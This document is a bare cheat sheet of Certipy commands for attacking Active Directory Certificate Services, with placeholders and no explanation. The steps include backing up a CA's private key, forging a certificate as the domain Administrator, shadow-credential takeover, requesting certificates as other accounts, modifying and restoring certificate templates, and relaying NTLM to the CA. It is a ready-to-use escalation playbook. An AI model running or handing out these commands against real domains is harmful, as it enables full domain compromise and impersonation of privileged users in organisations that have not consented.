https://github.com/ly4k/Certipy
certipy find -u <user>@<domain> -p <password> -dc-ip <dcIp> -ns <dnsIp> -dns-tcp
certipy ca -backup -ca '<certificateAuthority>' -u <user>@<domain> -hashes <ntHash>
certipy forge -ca-pfx certificateAuthority.pfx -upn <user>@<domain> -subject 'CN=Administrator,CN=Users,DC=<domainComponent>,DC=<domainComponent>'
certipy auth -pfx <certificateAuthority>.pfx -dc-ip <dcIp>
certipy shadow auto -u <user>@<domain> -p <password> -account <targetAccount>
certipy req -u <user>@<domain> -p <password> -ca <certificateAuthority> -target <fqdnDcCa> -template <targetTemplate> -upn <targetAccount>@<domain>
certipy auth -pfx <targetAccount>.pfx -dc-ip <dcIp>
certipy req -u <user>@<domain> -p <password> -ca <certificateAuthority> -target <fqdnDcCa> -template <targetTemplate>
certipy req -u <user>@<domain> -p <password> -ca <certificateAuthority> -target <fqdnDcCa> -template User -on-behalf-of '<domain>\<targetAccount>' -pfx <targetAccount>.pfx
certipy auth -pfx <targetAccount>.pfx -dc-ip <dcIp>
certipy template -u <user>@<domain> -p <password> -template <targetTemplate> -save-old
certipy req -u <user>@<domain> -p <password> -ca <certificateAuthority> -target <fqdnDcCa> -template <targetTemplate> -upn <targetAccount>@<domain>
certipy template -u <user>@<domain> -p <password> -template <targetTemplate> -configuration <targetTemplate>.json
certipy relay -ca <fqdnDcCa>